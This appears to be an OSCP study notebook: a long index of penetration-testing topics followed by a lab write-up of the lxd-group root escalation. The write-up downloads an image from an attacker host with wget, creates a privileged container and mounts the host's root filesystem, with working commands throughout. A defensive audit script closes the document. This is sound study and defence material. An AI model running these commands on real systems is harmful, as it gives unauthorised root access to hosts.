Index

My OSCP Preparation Notes

  1. Scanning
    1. Recon
      1. network
      2. web
        1. gobuster
        2. wfuzz
        3. webdav
        4. jenkins
    2. Nmap
      1. My way
        1. TCP
          1. Step1-Live host
          2. Step2-nmap Full port scan
          3. Step3-Run nmap Full port scan
          4. Step4-nmap Open port scan
          5. Step5-Run Open port scan
        2. UDP
          1. Step2-nmap Full port scan
          2. Step3-Run nmap Full port scan
          3. Step4-nmap Open port scan
          4. Step5-Run Open port scan
        3. FinalScanPart1
        4. FinalScanPart2
    3. Port Knock
  2. Enumeration
    1. HTTP
      1. Gobuster
      2. Nikto
      3. dirsearch
      4. WFuzz
        1. wfuzz username
      5. Command Injection
      6. Login Bypass
      7. Droopal Scan
      8. SSRF
      9. Hydra post form
      10. cewl
    2. FTP-21
      1. Download file from ftp
      2. Autobind ftp when ftp is permission denied for local user
      3. Remember while uploading a file to ftp
    3. SSH
      1. SSH Tunneling / Pivoting
      2. enum_ssh
      3. rbash shell escaping
      4. Login with RSA
      5. Decrypt RSA
      6. When bruteforcing hydra don't work
      7. lshell bypass
      8. different shell and their errors
      9. port knocking
    4. SMB
      1. Check smb version
    5. SNMP
      1. snmp_enum
      2. onesixtyone scanning for IPs
    6. MS SQL
      1. Microsoft_sql_enum
      2. Error based SQL
      3. boolean based
      4. Time based SQLi
      5. SQL Injection (SQL MAP)
      6. Blind sql
    7. finger_enum_user.sh
      1. Enum Image
    8. Telnet
    9. Pop3
    10. CMS
    11. Uncommon Port Exploitation search/Enum
    12. Steg extract
    13. RDP
    14. James 4555
    15. MDB tool
    16. OS
      1. linux
        1. commands
        2. tty
        3. basic enumeration
        4. suid
        5. cron
        6. grep
      2. windows
        1. basic commands
        2. samba version
        3. search
        4. version
  3. Shell
    1. msfvenom
      1. msf
    2. windows
    3. shell
    4. one liner
      1. php
      2. one liner
      3. infosec one liner
    5. powershell
    6. MSFVenom & Metasploit
      1. MSFVenom-payload
        1. Windows
        2. Linux
        3. Web Payload
        4. Binaries
      2. Metasploit
        1. meterpreter
        2. Meterpreter shell code
        3. MsfVenom Handler
      3. Netcat on windows
  4. Interactive shell
    1. Pseudo shell
      1. python
      2. bash
      3. awk
      4. perl
      5. ruby
      6. lua
      7. IRB
      8. tcpdump
      9. vi
      10. nmap
    2. Full interactive shell
      1. Magic on netcat
    3. Reverse shell
      1. bash
      2. python
      3. ruby
      4. Java
      5. Telnet
      6. netcat
      7. PHP
      8. Gawk
      9. URL reverseshell
      10. bypass & os command php
      11. curl
    4. Reverse Shell with Powercat
  5. File Transfer
    1. tftp
    2. http
    3. linux
    4. windows
    5. scp
    6. Transfer
      1. Windows
        1. Powershell
        2. Cert Util
        3. TFTP
        4. SCP
        5. netcat
        6. Debug
        7. bitsadmin
        8. smb
        9. rdp
      2. Linux
        1. FTP
        2. TFTP
        3. SCP
        4. netcat
        5. curl
        6. Wget
        7. With no tool
  6. WINDOWS - Privilege Escalation
    1. WINDOWS - SharpUp Results
    2. WINDOWS - Kernel
    3. WINDOWS - Services (Binpath)
    4. WINDOWS - Services (Unquoted path)
    5. WINDOWS - Services (Registry)
    6. WINDOWS - Registry (Autorun)
    7. WINDOWS - Registry (AlwaysInstallElevated)
    8. WINDOWS - PasswordMining (Memory)
    9. WINDOWS - Password (Registry)
    10. WINDOWS - Password (config files)
    11. WINDOWS - Scheduled task (Missing binary)
    12. WINDOWS - Startup Application
    13. WINDOWS - Passthehash
    14. WINDOWS - Unquoted Path Service
      1. adding new user
      2. rdp and stickykeys
    15. WINDOWS - (AlwaysInstallElevated)
      1. 1st method - msfvenom
      2. 2nd method - administrator
      3. 3rd way via msf
    16. WINDOWS - Automated Script
      1. Windows-Exploit-suggester
      2. Windows Gather Applied Patches
      3. Sherlock
      4. JAWS – Just Another Windows (Enum) Script
      5. powerup
    17. My Priv esc tech (Windows)
      1. mimikatz when protected SID files are discovered
      2. Login with obtained creds with psexec and powershell & smbclient
      3. Finding permission & actual file path of shortcut file or .lnk file
      4. icacls & cacls for find file & folder permissions and Edit permission
      5. Discovered VM on target location
      6. Discovered .mdb backup
      7. Discovered .kdbx Keepass database
      8. search file recursively
      9. List hidden files
      10. Got .dmp file, extract with volatility
      11. group.xml file with encoded password
      12. Get that "pass" out of the ADS backup.zip
      13. disable firewall enable rdp
      14. Finding windows version from a file
      15. got SAM System file use pwdump to dump hashes
      16. Windows
        1. Ebowla + Token Impersonation
        2. Non-interactive powershell file execution
        3. add user
        4. Convert Python to exe
        5. Manual Priv Check
        6. audit priv
  7. LINUX - Privilege Escalation
    1. LINUX - /etc/passwd -deeply
      1. openssl
      2. python
      3. perl
      4. mkpasswd
      5. php
    2. LINUX - Sudo -deeply
      1. Traditional Method to assign Root Privilege
      2. Default Method to assign Root Privilege
      3. find - Allow Root Privilege to Binary commands
      4. Allow Root Privilege to Binary Programs - Spawn shell
        1. perl
        2. python
        3. less
        4. awk - spawn
        5. man
        6. vi
        7. Allow Root Privilege to Shell Script
        8. bash script - spawn
        9. python script - spawn
        10. c script - spawn
        11. Allow Sudo Right to other Programs
        12. Env
        13. ftp
        14. socat
        15. scp
    3. LINUX - SUID - NMAP
    4. LINUX - LD_Preload
    5. LINUX - SUID - vim-tiny
    6. LINUX - writable
      1. cron
    7. LINUX - CRON
      1. cron
    8. LINUX - Automated Script
      1. linenum
      2. Linuxprivchecker
      3. linuxexploitsuggester2
      4. Bashark
      5. beroot
    9. LINUX - capabilities
      1. capability
    10. LINUX - Binaries for escalation
      1. zip
      2. wget
        1. passwd entry
      3. wget -2
      4. cat
      5. time
      6. Taskset
      7. git
      8. cp
      9. tmux
      10. tmux -2
      11. ed
      12. sed
      13. pip
      14. lxd
      15. socat
      16. scp
      17. capabilities
      18. perl
      19. docker
      20. perl -2
      21. tmp.py
      22. vi
      23. systemctl
      24. tar
      25. id-disk
      26. id-games
      27. python
      28. crontab
      29. tcpdump
      30. strace
      31. ssh
      32. make
      33. wine
      34. ftp
      35. micro
      36. mysql
      37. Simon
      38. tcpdump
      39. ht
      40. sls
      41. apt-get
      42. ed
      43. mawk
    11. LINUX - Exploiting SUDO CVE-2019-14287
  8. Buffer Overflow
    1. Minishare - Exploitation
    2. Brain Pan - Exploitation
  9. bruteforce
    1. ssh
    2. rdp
    3. ftp
    4. hashcat
    5. gpp-decrypt
    6. wp
    7. john
    8. hydra
    9. cewl and crunch
    10. medusa
    11. ncrack
    12. wfuzz
    13. fcrackzip
    14. keepass
    15. password Cracking
      1. zip
      2. NTLM
      3. /etc/shadow
      4. kbd keepass
      5. RSA Decrypting
      6. SHA512 $6$ shadow file
      7. MD5 $1$ shadow file
      8. john RAW MD5
      9. MD5 Apache webdav file $arp1$
      10. SHA1
      11. Auth Proxy
      12. WordPress (PHPASS) windows
      13. Crack MD5 windows
      14. $5$
      15. $krb5tgs$23$ Kerberos 5 hash
  10. compiling
  11. Tunneling
  12. Imp Tools

OSCP Practice (HTB & Vulnhub)

  1. HTB - linux
    1. tartarsauce
    2. nineveh
    3. haircut
    4. sunday
    5. poison
    6. swagshop
  2. HTB - windows
    1. legacy
    2. devel
    3. bastard
    4. optimum
    5. granny
    6. jeeves -juicypotato
    7. chatterbox
  3. HTB - ippsec windows
    1. access
    2. active
    3. Arctic
    4. arkham
    5. bastard
    6. bastion
    7. blue
    8. bounty
    9. brainfuck
    10. chatterbox
    11. devel
    12. granny
    13. grandpa
    14. jeeves
    15. node
    16. kotarak
    17. lame
    18. legacy
    19. mantis
    20. netmon
    21. optimum
    22. querier
    23. secnotes
    24. oracle
  4. HTB - ippsec linux
    1. Ariekei - docker
    2. Aragog - xxe
    3. Apocalyst - wp
    4. bank
    5. bart
    6. bashed
    7. beep
    8. bitlab
    9. blocky
    10. canape - db
    11. carrier
    12. chaos
    13. charon
    14. crimestoppers
    15. cronos
    16. curling
    17. dab - wfuzz
    18. DevOops
    19. Dropzone
    20. enterprise
    21. europa
    22. falafel
    23. flujab
    24. FluxCapacitor
    25. fortune - nfs
    26. FriendZone
    27. frolic - play
    28. haircut
    29. hawk
    30. haystack
    31. heist
    32. help
    33. irked
    34. jarvis
    35. lazy
    36. luke
    37. networked
    38. nibble
    39. nineveh
    40. zipper
    41. october
    42. onetwoseven
    43. oz
    44. poison
    45. popcorn
    46. sense
    47. shocker
    48. sneaky
    49. solidstate
    50. Stratosphere
    51. sunday
    52. swagshop
    53. tenten
    54. valentine
    55. waldo
    56. wall
    57. zetta
    58. teacher
    59. tartarsauce
    60. postman
  5. HTB without msf - ranakhalil
    1. Bashed (linux)
    2. Devel (windows)
    3. Lame (linux)
    4. legacy (windows)
    5. Optimum (windows)
    6. Arctic (Windows)
    7. Shocker (linux)
    8. Valentine (linux)
    9. nibble (linux)
    10. cronos (linux)
    11. Blue (windows)
    12. Irked (linux)
    13. Friendzone (linux)
    14. brainfuck (linux)
    15. beep (linux)
    16. nineveh (linux)
    17. Active (Windows)
    18. sense (freebsd)
    19. solidstate (linux)
    20. node (linux)
    21. Poison (freebsd)
    22. Sunday (solaris)
    23. Swagshop (linux)
    24. Jarvis (linux)
    25. Networked (linux)
    26. TartarSauce (linux)
    27. LaCasaDePapel (linux)
    28. Hawk (linux) - drupal
    29. lightweight (linux)
    30. Devoops (linux)
    31. falafel (linux)
    32. kotarak (linux)
    33. bastard (windows)
    34. granny (windows)
    35. grandpa (windows)
    36. bounty (windows) gobuster - webconfig -juicy
    37. jerry (windows)
    38. chatterbox (windows)
    39. Silo (windows)
    40. Conceal (Windows)
    41. Netmon (windows)
    42. jeeves (windows) jenkin
    43. bart (windows)
    44. tally (windows)
    45. jail
    46. safe
    47. bankrobber
  6. Vulnhub
    1. Bsides Vancouver
    2. raven 1
    3. raven 2
    4. acid 1
    5. violator
    6. troll 3
    7. pinkypalace v2
    8. pinkypalace v1
    9. digital world
      1. joy
      2. bravery
      3. mercy
      4. development
      5. torment
    10. skytower
    11. IMF
    12. troll1
    13. troll 2
    14. /dev/random sleepy
    15. BILLY MADISON
    16. wallabys-nightmare
    17. solidstate- james
    18. web developer - wp
    19. zico 1
    20. lin.security
    21. lord of the root - mysql udf
    22. pwnos 2.0
    23. sickos
    24. vulnos 2
    25. Mr. Robot 1
    26. stapler
    27. firstileaks
    28. kioptix 2014
    29. kioptix 1.3
    30. kioptix 1.2
    31. kioptix 1.1
    32. kioptix 1
    33. metasploitable 3
    34. metasploitable 2
    35. metasploitable 1
  7. Vulnhub2
    1. sunset desk
    2. me and my gf 1
    3. sunset sunrise
    4. UA Literally vulnerable
    5. in plain sight 1
    6. HA: Dhanush
    7. HA: Chanakya
    8. djinn
    9. Jigsaw
    10. evm1
    11. mumbai 1
    12. gears-of-war-ep1
    13. chakravyuh
    14. ha-avengers-arsenal
    15. ha-naruto
    16. joker - joomla
    17. isro
    18. hackerfest
    19. bossplayersctf
    20. Misdirection
    21. armour
    22. ha-wordy- wordpress
    23. dc8
    24. silky
    25. sunset dawn
    26. sunset dawn
    27. Prime
    28. teuchter
    29. violator
    30. symfonos4
    31. dc-7 - drupal
    32. ai web 2
    33. hack 6 day
    34. digitalworld-localtorment
    35. hack-the-gemini-inc2
    36. dev-random-k2-vm-boot2root
    37. hack the gemini
    38. ai web 1
    39. hack-the-lin-security - mast
    40. oracle padding
    41. nezuko-1-vulnhub
    42. minu-v2
    43. digitalworld-local-joy
    44. symfonos2
    45. Matrix-3
    46. pumpkinraising
    47. symfonos1
    48. W1R3S.inc VM
    49. hack the de ice
    50. hack-kevgir
    51. vulnos-1
    52. dexter
    53. pwnlab
    54. sputnik-1 splunk
    55. dc1

lxd

A member of the local "lxd" group can escalate to root on the host operating system. This holds regardless of whether the user has been granted sudo rights, and it does not require them to enter a password. The weakness is present even when LXD is installed from the snap package.
LXD runs as root and carries out actions on behalf of anyone with write access to the LXD UNIX socket; it generally makes no attempt to match the privileges of the calling user. There are several ways to exploit this.
The method used in this post is to drive the LXD API into mounting the host's root filesystem inside a container, which gives a low-privilege user root-level access to the host filesystem.


Introduction to LXD and LXC
Linux Containers (LXC) is often described as a lightweight virtualization technology that sits somewhere between a chroot and a fully fledged virtual machine: it creates an environment as close as possible to a normal Linux installation, but without the need for a separate kernel.
LXD (the Linux container daemon) is the "lightervisor", or lightweight container hypervisor. LXD builds on top of LXC, the container technology that Docker used in its early days. It uses the stable LXC API to do all of the container management behind the scenes, adds a REST API on top, and provides a much simpler and more consistent user experience.


1. Steps to be performed on the attacker machine:
• Download build-alpine from its git repository onto the attacker machine.
• Execute the "build-alpine" script, which builds the latest Alpine image as a compressed tar file; this step must be executed by the root user.
• Transfer the tar file to the host machine.

2. Steps to be performed on the host machine:
• Download the Alpine image.
• Import the image into LXD.
• Initialize the image inside a new container.
• Mount the host's root filesystem inside the container (under /mnt/root).


git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

cd /tmp
wget http://ip:8000/alpine-v3.x.x.x.x

# the alias lets the next step refer to the imported image as "myimage"
lxc image import ./alpine-v3.x.x.x.x --alias myimage


lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

# inside the container: the host's / is visible under /mnt/root
cd /mnt/root/root
ls
flag.txt
cat flag.txt
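An audit script for the three conditions this technique relies on, added here as an example and not part of the original notes: it lists non-root members of the lxd group, flags containers with security.privileged set to true, and reports disk devices whose source is the host root. The parsers read command output on stdin, so they work on the constructed sample embedded below as well as on real getent and lxc output; the function names and the --live flag are this example's own.

```shell
#!/bin/sh
# Audit script for the lxd-group escalation path (added example; not from the original notes).
# Each parser reads command output on stdin, so it can be run on constructed text as well as live.

# Non-root members of the "lxd" group from getent(1)-style lines (name:x:gid:member,member).
lxd_group_members() {
    awk -F: '$1 == "lxd" { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] != "root" && m[i] != "") print m[i] }'
}

# "privileged" or "unprivileged" from `lxc config show <name> --expanded` output.
container_privilege() {
    if grep -Eq '^[[:space:]]*security\.privileged:[[:space:]]*"?true"?[[:space:]]*$'; then echo privileged; else echo unprivileged; fi
}

# Names of disk devices in that output whose source is the host root filesystem (source: /).
host_root_disk_devices() {
    awk '
        /^devices:/            { in_dev = 1; next }
        in_dev && /^[^ ]/      { in_dev = 0 }
        in_dev && /^  [^ ]+:$/ { dev = $1; sub(":$", "", dev); next }
        in_dev && /^    type:[[:space:]]*disk[[:space:]]*$/ { is_disk[dev] = 1 }
        in_dev && /^    source:[[:space:]]*\/[[:space:]]*$/ { is_root[dev] = 1 }
        END { for (d in is_disk) if (is_root[d]) print d }'
}

# Live audit of this host; the container checks need the lxc client on PATH.
audit_host() {
    echo "Non-root lxd group members (each can drive the root-owned LXD daemon):"
    getent group lxd | lxd_group_members
    for c in $(lxc list -c n --format csv 2>/dev/null); do
        cfg=$(lxc config show "$c" --expanded 2>/dev/null)
        printf '%s: %s; host-root disk devices: %s\n' "$c" \
            "$(printf '%s\n' "$cfg" | container_privilege)" \
            "$(printf '%s\n' "$cfg" | host_root_disk_devices | tr '\n' ' ')"
    done
}
# Constructed sample of `lxc config show` output, shaped like the container built in the steps above.
SAMPLE_CFG='config:
  security.privileged: "true"
devices:
  mydevice:
    source: /
    type: disk
ephemeral: false'
if [ "${1:-}" = "--live" ]; then audit_host; else
    printf 'sample container: %s; host-root disk devices: %s\n' \
        "$(printf '%s\n' "$SAMPLE_CFG" | container_privilege)" \
        "$(printf '%s\n' "$SAMPLE_CFG" | host_root_disk_devices | tr '\n' ' ')"
fi
```

Run it with --live on a host to check the real lxd group and every container; without arguments it only exercises the parsers on the constructed sample.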

